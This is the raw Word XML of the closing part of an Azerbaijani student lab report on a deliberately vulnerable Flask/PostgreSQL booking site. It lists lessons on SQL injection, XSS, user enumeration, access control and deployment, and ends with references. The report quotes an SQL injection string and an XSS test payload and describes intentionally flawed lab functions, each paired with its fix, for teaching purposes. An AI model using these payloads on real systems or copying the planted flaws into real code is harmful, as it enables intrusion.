        <w:t xml:space="preserve">9. Nəticə</w:t>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Bu layihə yalnız nəzəriyyədə qalan kibertəhlükəsizlik konsepsiyalarını praktik, tam işlək bir veb tətbiq üzərində tətbiq etməyə imkan yaratdı. İkinci kurs səviyyəsində bir tələbə üçün sıfırdan həm backend (Flask), həm verilənlər bazası (PostgreSQL), həm də frontend (Vanilla JS) arxitekturasını qurmaq və üzərinə tədris məqsədli OWASP Top 10 zəifliklərini yerləşdirmək olduqca mürəkkəb, lakin öyrədici bir proses idi. Aşağıda beş əsas praktiki dərs xülasə edilir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dərs 1: Zəiflikləri Kod Səviyyəsində Anlamaq</w:t>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Kitablarda "SQL Injection üçün ' OR 1=1-- yazın" deyilir. Amma bu kodun arxada necə işlədiyini görmək tamamilə fərqli bir təcrübədir. _user_lookup_concat funksiyasını özüm yazıb, psycopg2-nin %s parametrləşməsinin niyə təhlükəsiz olduğunu da öz əlimlə kodladıqda, bu problemi birdəfəlik həll etmək deməkdir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dərs 2: Çox Qatlı Müdafiə (Defense in Depth)</w:t>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Tək bir müdafiə qatı heç vaxt kifayət etmir. XSS hücumlarına qarşı mübarizəni həm serverdə (bleach kitabxanası) həm də brauzerdə (textContent, DOMPurify) həyata keçirmək lazımdır. auth.js-də SQLi nəticəsini göstərərkən textContent istifadə etməyin səbəbi tam da budur — hücumçu &lt;script&gt;alert(1)&lt;/script&gt; göndərsə belə, yalnız işarə kimi göstərilir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dərs 3: Məlumat Sızdırmama Qaydası</w:t>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Giriş funksiyasını hazırlayarkən User Enumeration hücum növünün qarşısını almaq üçün eyni xəta mesajı ("E-poçt və ya parol səhvdir") hər iki uğursuz hal üçün istifadə edildi. Müxtəlif mesajlar göndərilsə, hücumçu kimin sistemdə qeydiyyatdan keçdiyini aşkarlaya bilər. Həmçinin istehsal mühitlərində query_probe / sql_fragment kimi debug məlumatlarının cavabdan çıxarılması mütləqdir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dərs 4: Rol Əsaslı Giriş Nəzarəti</w:t>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Admin panelini "e-poçt == admin@aviakassa.com" yoxlaması ilə qorumaq olduqca kövrək bir memarlıqdır. Əsl layihələrdə Rol Əsaslı Giriş Nəzarəti (RBAC) user_roles kimi ayrıca DB cədvəlindən idarə edilməlidir. IDOR üçün isə düzgün həll çox sadədir: AND t.user_id = %s şərtini əlavə etmək — bu ikinci yoxlama olmadan bütün istifadəçilərin sifarişlərini görmək mümkün olardı.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dərs 5: İstehsal Mühiti Hər Şeyi Dəyişir</w:t>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localhost (127.0.0.1) mühitini Vercel kimi serverless bulud platformasında deploy etdikdə bütün parametrlər dəyişir: SSL/TLS (sslmode=require), cookie təhlükəsizliyi (Secure=True), /tmp/ fayl sistemi məhdudiyyəti. Bu fərqlər üçün _is_vercel_runtime() funksiyası dörd müxtəlif üsulla Vercel mühitini aşkarlayır — müdafiəli proqramlaşdırmanın (defensive programming) real nümunəsi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="2E75B6" w:sz="24"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EEF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Son söz: Kibertəhlükəsizlik yalnız sındırmaqdan ibarət deyil. Ən vacib bacarıq — zəiflikləri anlamaq, koddakı xətaları tapmaq və onlara davamlı, təhlükəsiz proqramlaşdırma metodları ilə yamaqlar hazırlamaqdır. Bu Aviakassa layihəsi kod sətirləri arxasındakı təhlükəsizliyin dəyərini sübut etdi.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">10. İstinadlar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.1. Rəsmi Sənədlər</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5000"/>
        <w:gridCol w:w="3846"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Resurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Əlaqəli Kod</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Flask Rəsmi Sənədlər — https://flask.palletsprojects.com/en/3.0.x/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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@app.route(), jsonify(), session idarəetməsi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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MDN Web Docs — Vanilla JavaScript — https://developer.mozilla.org/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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auth.js, panel.js — fetch(), DOM manipulyasiyası</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Psycopg2 Usage Docs — https://www.psycopg.org/docs/usage.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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user_get_by_email() — %s parametrləşdirməsi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Werkzeug Security Module — https://werkzeug.palletsprojects.com/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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generate_password_hash(), check_password_hash()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.2. Kibertəhlükəsizlik Resursları</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5000"/>
        <w:gridCol w:w="3846"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Resurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tətbiqi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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OWASP Top 10 (2021) — https://owasp.org/Top10/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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Bütün lab ssenarilərinin çərçivəsi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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OWASP A03:2021 — Injection — https://owasp.org/Top10/A03_2021-Injection/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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_user_lookup_concat lab funksiyası</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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OWASP XSS Prevention Cheat Sheet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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esc(), textContent, DOMPurify tətbiqləri</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Mozilla Developer: Content-Security-Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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Yamalar bölməsindəki CSP hook tövsiyəsi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.3. Deploy və Altyapı</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5000"/>
        <w:gridCol w:w="3846"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Resurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tətbiqi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>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Vercel Serverless with Flask — https://vercel.com/docs/frameworks/backend/flask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>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vercel.json, api/index.py, _is_vercel_runtime()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>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Neon PostgreSQL Docs — https://neon.tech/docs/introduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="6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DATABASE_URL, sslmode=require, connect_timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId7"/>
      <w:footerReference w:type="default" r:id="rId8"/>
      <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
      <w:pgMar w:top="1440" w:right="126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spacing w:after="0" w:before="80"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Səhifə </w:t>
    </w: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r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> / </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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spacing w:after="80" w:before="0"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:i/>
        <w:iCs/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Aviakassa — Web Təhlükəsizliyi Lab Hesabatı</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color w:val="1F3864"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>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2E75B6"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="80" w:before="180"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3864"/>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2026-04-04T21:03:47.533Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-04T21:03:47.534Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>